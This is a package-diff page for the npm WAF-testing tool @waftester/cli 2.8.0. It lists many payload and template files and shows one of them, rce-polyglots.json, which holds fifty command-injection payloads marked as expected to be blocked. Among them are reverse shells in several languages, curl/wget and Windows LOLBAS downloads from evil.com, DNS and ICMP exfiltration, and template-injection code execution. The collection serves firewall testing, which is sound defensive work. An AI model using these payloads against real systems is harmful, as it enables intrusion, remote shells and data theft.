npm - @waftester/cli - Versions diffs - 2.8.0 - Mend

@waftester/cli 2.8.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (141) hide show

package/LICENSE +80 -0
package/LICENSE-COMMUNITY +28 -0
package/README.md +121 -0
package/bin/cli.js +152 -0
package/package.json +52 -0
package/payloads/community/README.md +45 -0
package/payloads/community/ai/ml-poisoning.json +173 -0
package/payloads/community/ai/prompt-injection.json +247 -0
package/payloads/community/ai/workflow-abuse.json +222 -0
package/payloads/community/auth/jwt.json +855 -0
package/payloads/community/auth/login-bypass.json +623 -0
package/payloads/community/auth/mfa.json +402 -0
package/payloads/community/auth/oauth.json +421 -0
package/payloads/community/auth/open-redirect.json +1028 -0
package/payloads/community/auth/session.json +404 -0
package/payloads/community/cache/deception.json +402 -0
package/payloads/community/cache/poisoning.json +403 -0
package/payloads/community/deserialization/gadget.json +375 -0
package/payloads/community/deserialization/prototype.json +370 -0
package/payloads/community/fuzz/content-type.json +397 -0
package/payloads/community/fuzz/headers.json +401 -0
package/payloads/community/fuzz/methods.json +397 -0
package/payloads/community/fuzz/obfuscation.json +362 -0
package/payloads/community/fuzz/special-chars.json +740 -0
package/payloads/community/fuzz/waf-bypass.json +452 -0
package/payloads/community/graphql/batching-abuse.json +271 -0
package/payloads/community/graphql/depth-limit.json +271 -0
package/payloads/community/graphql/introspection.json +267 -0
package/payloads/community/injection/crlf.json +569 -0
package/payloads/community/injection/ldap.json +357 -0
package/payloads/community/injection/nosqli.json +529 -0
package/payloads/community/injection/oscmd.json +662 -0
package/payloads/community/injection/rce-polyglots.json +452 -0
package/payloads/community/injection/sqli.json +681 -0
package/payloads/community/injection/ssti.json +584 -0
package/payloads/community/injection/upload-attacks.json +632 -0
package/payloads/community/injection/xpath.json +357 -0
package/payloads/community/injection/xxe.json +716 -0
package/payloads/community/logic/forced-browsing.json +405 -0
package/payloads/community/logic/idor.json +1026 -0
package/payloads/community/logic/privilege.json +337 -0
package/payloads/community/media/exif-injection.json +225 -0
package/payloads/community/media/metadata-poison.json +239 -0
package/payloads/community/protocol/http-smuggling.json +798 -0
package/payloads/community/protocol/http2-attacks.json +382 -0
package/payloads/community/protocol/websocket-abuse.json +375 -0
package/payloads/community/rate-limit/burst-simulation.json +286 -0
package/payloads/community/rate-limit/bypass-attempts.json +326 -0
package/payloads/community/rate-limit/zone-tests.json +332 -0
package/payloads/community/services/authentik.json +415 -0
package/payloads/community/services/immich.json +423 -0
package/payloads/community/services/n8n.json +366 -0
package/payloads/community/sqli-basic.json +182 -0
package/payloads/community/ssrf/cloud-metadata.json +999 -0
package/payloads/community/ssrf/dns-rebinding.json +503 -0
package/payloads/community/ssrf/internal-networks.json +627 -0
package/payloads/community/ssrf/protocol-smuggling.json +350 -0
package/payloads/community/ssti/multi-language-templates.json +191 -0
package/payloads/community/ssti/python-templates.json +200 -0
package/payloads/community/traversal/basic.json +675 -0
package/payloads/community/traversal/cloud-credentials.json +107 -0
package/payloads/community/traversal/config-files.json +193 -0
package/payloads/community/traversal/encoding.json +558 -0
package/payloads/community/traversal/null-byte.json +105 -0
package/payloads/community/traversal/symlink.json +93 -0
package/payloads/community/traversal/unicode.json +134 -0
package/payloads/community/traversal/unix-advanced.json +195 -0
package/payloads/community/traversal/windows-advanced.json +195 -0
package/payloads/community/waf-bypass/cloudflare-bypass.json +102 -0
package/payloads/community/waf-bypass/encoding-bypass.json +120 -0
package/payloads/community/waf-bypass/evasion-techniques.json +164 -0
package/payloads/community/waf-bypass/hpp-bypass.json +92 -0
package/payloads/community/waf-bypass/modsecurity-crs.json +220 -0
package/payloads/community/waf-bypass/protocol-attacks.json +101 -0
package/payloads/community/waf-bypass/sqlmap-tamper.json +252 -0
package/payloads/community/waf-bypass/unicode-charset.json +152 -0
package/payloads/community/waf-bypass/vendor-bypasses.json +72 -0
package/payloads/community/waf-validation/README.md +172 -0
package/payloads/community/waf-validation/bypass-techniques.json +272 -0
package/payloads/community/waf-validation/custom-rules.json +952 -0
package/payloads/community/waf-validation/evasion-techniques.json +272 -0
package/payloads/community/waf-validation/modsecurity-core.json +151 -0
package/payloads/community/waf-validation/owasp-top10.json +236 -0
package/payloads/community/waf-validation/regression-tests.json +227 -0
package/payloads/community/xss/csp-bypass.json +431 -0
package/payloads/community/xss/dom.json +389 -0
package/payloads/community/xss/filter-bypass.json +1242 -0
package/payloads/community/xss/mutation.json +263 -0
package/payloads/community/xss/polyglots.json +371 -0
package/payloads/community/xss/reflected.json +187 -0
package/payloads/community/xss/stored.json +330 -0
package/payloads/crlf-injection.json +182 -0
package/payloads/ids-map.json +155 -0
package/payloads/ldap-injection.json +182 -0
package/payloads/nosql-injection.json +227 -0
package/payloads/prototype-pollution.json +182 -0
package/payloads/request-smuggling.json +182 -0
package/payloads/version.json +28 -0
package/payloads/xss-advanced.json +227 -0
package/templates/README.md +221 -0
package/templates/nuclei/http/waf-bypass/crlf-bypass.yaml +146 -0
package/templates/nuclei/http/waf-bypass/lfi-bypass.yaml +152 -0
package/templates/nuclei/http/waf-bypass/nosqli-bypass.yaml +166 -0
package/templates/nuclei/http/waf-bypass/rce-bypass.yaml +171 -0
package/templates/nuclei/http/waf-bypass/sqli-basic.yaml +142 -0
package/templates/nuclei/http/waf-bypass/sqli-evasion.yaml +192 -0
package/templates/nuclei/http/waf-bypass/ssrf-bypass.yaml +130 -0
package/templates/nuclei/http/waf-bypass/ssti-bypass.yaml +147 -0
package/templates/nuclei/http/waf-bypass/xss-basic.yaml +163 -0
package/templates/nuclei/http/waf-bypass/xss-evasion.yaml +217 -0
package/templates/nuclei/http/waf-bypass/xxe-bypass.yaml +204 -0
package/templates/nuclei/http/waf-detection/akamai-detect.yaml +105 -0
package/templates/nuclei/http/waf-detection/aws-waf-detect.yaml +115 -0
package/templates/nuclei/http/waf-detection/azure-waf-detect.yaml +114 -0
package/templates/nuclei/http/waf-detection/cloudflare-detect.yaml +121 -0
package/templates/nuclei/http/waf-detection/modsecurity-detect.yaml +129 -0
package/templates/nuclei/workflows/waf-assessment-workflow.yaml +71 -0
package/templates/output/asff.tmpl +61 -0
package/templates/output/csv.tmpl +4 -0
package/templates/output/junit.tmpl +34 -0
package/templates/output/markdown-report.tmpl +92 -0
package/templates/output/slack-notification.tmpl +95 -0
package/templates/output/text-summary.tmpl +56 -0
package/templates/overrides/api-only.yaml +130 -0
package/templates/overrides/crs-tuning.yaml +204 -0
package/templates/overrides/false-positive-suppression.yaml +159 -0
package/templates/policies/owasp-top10.yaml +152 -0
package/templates/policies/pci-dss.yaml +124 -0
package/templates/policies/permissive.yaml +40 -0
package/templates/policies/standard.yaml +57 -0
package/templates/policies/strict.yaml +72 -0
package/templates/report-configs/compliance.yaml +173 -0
package/templates/report-configs/dark.yaml +136 -0
package/templates/report-configs/enterprise.yaml +175 -0
package/templates/report-configs/minimal.yaml +84 -0
package/templates/report-configs/print.yaml +139 -0
package/templates/workflows/api-scan.yaml +132 -0
package/templates/workflows/ci-gate.yaml +129 -0
package/templates/workflows/full-scan.yaml +133 -0
package/templates/workflows/quick-probe.yaml +80 -0
package/templates/workflows/waf-detection.yaml +89 -0

package/payloads/community/injection/rce-polyglots.json ADDED Viewed

@@ -0,0 +1,452 @@
+[
+  {
+      "id": "RCE-POLY-001",
+      "payload": ";${IFS}cat${IFS}/etc/passwd",
+      "tags": ["ifs-bypass", "unix", "quick"],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "IFS variable space bypass",
+      "category": "Injection"
+  },
+  {
+      "id": "RCE-POLY-002",
+      "payload": ";{cat,/etc/passwd}",
+      "tags": ["brace-expansion", "unix", "quick"],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Bash brace expansion bypass",
+      "category": "Injection"
+  },
+  {
+      "id": "RCE-POLY-003",
+      "payload": ";cat$IFS/etc/passwd",
+      "tags": ["ifs-variable", "unix"],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "IFS variable without braces",
+      "category": "Injection"
+  },
+  {
+      "id": "RCE-POLY-004",
+      "payload": ";X=$'cat\\x20/etc/passwd'&&$X",
+      "tags": ["ansi-c", "hex-escape", "unix"],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "ANSI-C quoting hex escape",
+      "category": "Injection"
+  },
+  {
+      "id": "RCE-POLY-005",
+      "payload": "| cat</etc/passwd",
+      "tags": ["input-redirect", "unix"],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Input redirection without space",
+      "category": "Injection"
+  },
+  {
+      "id": "RCE-POLY-006",
+      "payload": "$(printf 'cat /etc/passwd')",
+      "tags": ["printf", "substitution"],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Printf command construction",
+      "category": "Injection"
+  },
+  {
+      "id": "RCE-POLY-007",
+      "payload": "`echo$IFS'cat'$IFS'/etc/passwd'`",
+      "tags": ["echo-construction", "ifs"],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Echo with IFS command construction",
+      "category": "Injection"
+  },
+  {
+      "id": "RCE-POLY-008",
+      "payload": ";/???/c?t /???/p?sswd",
+      "tags": ["glob", "wildcard", "unix"],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Glob pattern matching",
+      "category": "Injection"
+  },
+  {
+      "id": "RCE-POLY-009",
+      "payload": ";/???/[c]at /???/[p]asswd",
+      "tags": ["glob", "bracket", "unix"],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Bracket glob expression",
+      "category": "Injection"
+  },
+  {
+      "id": "RCE-POLY-010",
+      "payload": "${PATH:0:1}etc${PATH:0:1}passwd",
+      "tags": ["variable-slice", "path-inject"],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "PATH variable slicing for slash",
+      "category": "Injection"
+  },
+  {
+      "id": "RCE-POLY-011",
+      "payload": "$(echo${IFS}id)",
+      "tags": ["echo-exec", "ifs"],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Echo with IFS for execution",
+      "category": "Injection"
+  },
+  {
+      "id": "RCE-POLY-012",
+      "payload": ";$0<<<'id'",
+      "tags": ["here-string", "bash"],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Here-string execution",
+      "category": "Injection"
+  },
+  {
+      "id": "RCE-POLY-013",
+      "payload": "a]||id||a[",
+      "tags": ["bracket-escape", "or-chain"],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Bracket escape with OR chain",
+      "category": "Injection"
+  },
+  {
+      "id": "RCE-POLY-014",
+      "payload": "a]|id|a[",
+      "tags": ["bracket-escape", "pipe"],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Bracket escape with pipe",
+      "category": "Injection"
+  },
+  {
+      "id": "RCE-POLY-015",
+      "payload": ";bash -c 'id'",
+      "tags": ["bash-c", "explicit"],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Explicit bash -c execution",
+      "category": "Injection"
+  },
+  {
+      "id": "RCE-POLY-016",
+      "payload": ";sh -c 'id'",
+      "tags": ["sh-c", "explicit"],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Explicit sh -c execution",
+      "category": "Injection"
+  },
+  {
+      "id": "RCE-POLY-017",
+      "payload": "|bash -i >& /dev/tcp/10.0.0.1/4444 0>&1",
+      "tags": ["reverse-shell", "bash"],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Bash reverse shell",
+      "category": "Injection"
+  },
+  {
+      "id": "RCE-POLY-018",
+      "payload": "python -c 'import socket,subprocess,os;s=socket.socket();s.connect((\"10.0.0.1\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/sh\",\"-i\"])'",
+      "tags": ["reverse-shell", "python"],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Python reverse shell",
+      "category": "Injection"
+  },
+  {
+      "id": "RCE-POLY-019",
+      "payload": "perl -e 'use Socket;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));connect(S,sockaddr_in(4444,inet_aton(\"10.0.0.1\")));open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");'",
+      "tags": ["reverse-shell", "perl"],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Perl reverse shell",
+      "category": "Injection"
+  },
+  {
+      "id": "RCE-POLY-020",
+      "payload": "php -r '$sock=fsockopen(\"10.0.0.1\",4444);exec(\"/bin/sh -i <&3 >&3 2>&3\");'",
+      "tags": ["reverse-shell", "php"],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "PHP reverse shell",
+      "category": "Injection"
+  },
+  {
+      "id": "RCE-POLY-021",
+      "payload": "ruby -rsocket -e'f=TCPSocket.open(\"10.0.0.1\",4444).to_i;exec sprintf(\"/bin/sh -i <&%d >&%d 2>&%d\",f,f,f)'",
+      "tags": ["reverse-shell", "ruby"],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Ruby reverse shell",
+      "category": "Injection"
+  },
+  {
+      "id": "RCE-POLY-022",
+      "payload": "nc -e /bin/sh 10.0.0.1 4444",
+      "tags": ["reverse-shell", "netcat"],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Netcat reverse shell with -e",
+      "category": "Injection"
+  },
+  {
+      "id": "RCE-POLY-023",
+      "payload": "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 4444 >/tmp/f",
+      "tags": ["reverse-shell", "netcat-fifo"],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Netcat reverse shell with FIFO",
+      "category": "Injection"
+  },
+  {
+      "id": "RCE-POLY-024",
+      "payload": ";curl http://evil.com/shell.sh|bash",
+      "tags": ["remote-exec", "curl-pipe"],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Curl pipe to bash",
+      "category": "Injection"
+  },
+  {
+      "id": "RCE-POLY-025",
+      "payload": ";wget -qO- http://evil.com/shell.sh|bash",
+      "tags": ["remote-exec", "wget-pipe"],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Wget pipe to bash",
+      "category": "Injection"
+  },
+  {
+      "id": "RCE-POLY-026",
+      "payload": "{{constructor.constructor('return this.process.mainModule.require(\"child_process\").execSync(\"id\")')()}}",
+      "tags": ["nodejs", "prototype-chain"],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Node.js prototype chain RCE",
+      "category": "Injection"
+  },
+  {
+      "id": "RCE-POLY-027",
+      "payload": "require('child_process').exec('id')",
+      "tags": ["nodejs", "require"],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Node.js child_process require",
+      "category": "Injection"
+  },
+  {
+      "id": "RCE-POLY-028",
+      "payload": "__import__('os').system('id')",
+      "tags": ["python", "import"],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Python __import__ RCE",
+      "category": "Injection"
+  },
+  {
+      "id": "RCE-POLY-029",
+      "payload": "eval(compile('import os;os.system(\"id\")','','exec'))",
+      "tags": ["python", "eval-compile"],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Python eval/compile RCE",
+      "category": "Injection"
+  },
+  {
+      "id": "RCE-POLY-030",
+      "payload": "exec(\"import os;os.system('id')\")",
+      "tags": ["python", "exec"],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Python exec RCE",
+      "category": "Injection"
+  },
+  {
+      "id": "RCE-POLY-031",
+      "payload": "getattr(getattr(__builtins__,'__import__')('os'),'system')('id')",
+      "tags": ["python", "getattr-chain"],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Python getattr chain RCE",
+      "category": "Injection"
+  },
+  {
+      "id": "RCE-POLY-032",
+      "payload": "{{''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read()}}",
+      "tags": ["python", "ssti", "jinja2"],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Jinja2 SSTI file read",
+      "category": "Injection"
+  },
+  {
+      "id": "RCE-POLY-033",
+      "payload": "{{config.__class__.__init__.__globals__['os'].popen('id').read()}}",
+      "tags": ["python", "ssti", "flask"],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Flask config SSTI RCE",
+      "category": "Injection"
+  },
+  {
+      "id": "RCE-POLY-034",
+      "payload": "#{T(java.lang.Runtime).getRuntime().exec('id')}",
+      "tags": ["java", "spring-el"],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Spring Expression Language RCE",
+      "category": "Injection"
+  },
+  {
+      "id": "RCE-POLY-035",
+      "payload": "${T(java.lang.Runtime).getRuntime().exec('id')}",
+      "tags": ["java", "spring-el"],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Spring EL with dollar sign",
+      "category": "Injection"
+  },
+  {
+      "id": "RCE-POLY-036",
+      "payload": "new java.lang.ProcessBuilder(new java.lang.String[]{\"id\"}).start()",
+      "tags": ["java", "process-builder"],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Java ProcessBuilder RCE",
+      "category": "Injection"
+  },
+  {
+      "id": "RCE-POLY-037",
+      "payload": "${{<%[%'\"}}%\\",
+      "tags": ["polyglot", "ssti-detect"],
+      "expected_block": true,
+      "severity_hint": "High",
+      "notes": "SSTI detection polyglot",
+      "category": "Injection"
+  },
+  {
+      "id": "RCE-POLY-038",
+      "payload": "{{7*7}}[[7*7]]${7*7}${{7*7}}#{7*7}*{7*7}",
+      "tags": ["polyglot", "ssti-math"],
+      "expected_block": true,
+      "severity_hint": "High",
+      "notes": "SSTI math evaluation polyglot",
+      "category": "Injection"
+  },
+  {
+      "id": "RCE-POLY-039",
+      "payload": ";echo${IFS}$(whoami)",
+      "tags": ["ifs", "nested-substitution"],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "IFS with nested command substitution",
+      "category": "Injection"
+  },
+  {
+      "id": "RCE-POLY-040",
+      "payload": "||nslookup${IFS}$(whoami).evil.com||",
+      "tags": ["dns-exfil", "out-of-band"],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "DNS exfiltration OOB",
+      "category": "Injection"
+  },
+  {
+      "id": "RCE-POLY-041",
+      "payload": ";ping${IFS}-c${IFS}1${IFS}$(whoami).evil.com",
+      "tags": ["icmp-exfil", "out-of-band"],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "ICMP exfiltration OOB",
+      "category": "Injection"
+  },
+  {
+      "id": "RCE-POLY-042",
+      "payload": "cmd.exe /c \"whoami\"",
+      "tags": ["windows", "cmd"],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Windows cmd.exe execution",
+      "category": "Injection"
+  },
+  {
+      "id": "RCE-POLY-043",
+      "payload": "powershell.exe -c \"whoami\"",
+      "tags": ["windows", "powershell"],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "PowerShell command execution",
+      "category": "Injection"
+  },
+  {
+      "id": "RCE-POLY-044",
+      "payload": "powershell -enc JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0A",
+      "tags": ["windows", "powershell", "encoded"],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "PowerShell base64 encoded command",
+      "category": "Injection"
+  },
+  {
+      "id": "RCE-POLY-045",
+      "payload": "certutil -urlcache -split -f http://evil.com/shell.exe C:\\Windows\\Temp\\shell.exe",
+      "tags": ["windows", "lolbas", "certutil"],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Certutil download LOLBAS",
+      "category": "Injection"
+  },
+  {
+      "id": "RCE-POLY-046",
+      "payload": "bitsadmin /transfer job /download /priority high http://evil.com/shell.exe C:\\Windows\\Temp\\shell.exe",
+      "tags": ["windows", "lolbas", "bitsadmin"],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Bitsadmin download LOLBAS",
+      "category": "Injection"
+  },
+  {
+      "id": "RCE-POLY-047",
+      "payload": "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"calc.exe\"\", 0:close\")",
+      "tags": ["windows", "lolbas", "mshta"],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "MSHTA VBScript execution",
+      "category": "Injection"
+  },
+  {
+      "id": "RCE-POLY-048",
+      "payload": "regsvr32 /s /n /u /i:http://evil.com/shell.sct scrobj.dll",
+      "tags": ["windows", "lolbas", "regsvr32"],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Regsvr32 SCT execution",
+      "category": "Injection"
+  },
+  {
+      "id": "RCE-POLY-049",
+      "payload": "rundll32 javascript:\"\\..\\mshtml,RunHTMLApplication\";document.write(\"<script>new%20ActiveXObject('WScript.Shell').Run('calc.exe')</script>\")",
+      "tags": ["windows", "lolbas", "rundll32"],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Rundll32 JavaScript execution",
+      "category": "Injection"
+  },
+  {
+      "id": "RCE-POLY-050",
+      "payload": "wmic process call create \"cmd.exe /c whoami > C:\\out.txt\"",
+      "tags": ["windows", "wmic"],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "WMIC process creation",
+      "category": "Injection"
+  }
+]